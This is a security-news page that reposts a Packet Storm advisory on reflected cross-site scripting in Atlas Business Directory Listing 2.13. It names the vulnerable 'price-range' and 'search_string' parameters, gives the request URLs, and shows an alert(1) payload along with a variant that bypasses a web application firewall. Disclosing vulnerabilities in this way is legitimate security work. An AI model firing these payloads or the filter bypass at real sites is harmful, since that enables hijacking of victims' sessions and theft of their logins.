Security
Headlines
HeadlinesLatestCVEs

Headline

Atlas Business Directory Listing 2.13 Cross Site Scripting

Atlas Business Directory Listing version 2.13 suffers from cross site scripting vulnerabilities.

Packet Storm
Open in Source
#xss#vulnerability#web#windows#auth#ssh
# Exploit Title: Atlas Business Directory Listing 2.13 - Reflected XSS# Exploit Author: CraCkEr# Date: 09/07/2023# Vendor: Creativeitem# Vendor Homepage: https://creativeitem.com/# Software Link: https://demo.creativeitem.com/atlas/# Tested on: Windows 10 Pro# Impact: Manipulate the content of the site ## DescriptionThe attacker can send to victim a link containing a malicious URL in an email or instant messagecan perform a wide variety of actions, such as stealing the victim's session token or login credentialsPath: /atlas/home/filter_listingsGET parameter 'price-range' is vulnerable to XSShttps://website/atlas/home/filter_listings?category=family-style&&amenity=good-for-kids&&city=marseille&&price-range=790[XSS]&&video=1&&status=openPath: /atlas/home/searchGET parameter 'search_string' is vulnerable to XSShttps://website/atlas/home/search?search_string=[XSS]&selected_city_id=&selected_category_id=11Simple XSS Payload (Blocked by WAF) : <script>alert(1)</script> XSS Filter Bypass : "><script>alert(1)</script>[-] Done

Packet Storm: Latest News

Scapy Packet Manipulation Tool 2.6.1
Packet Storm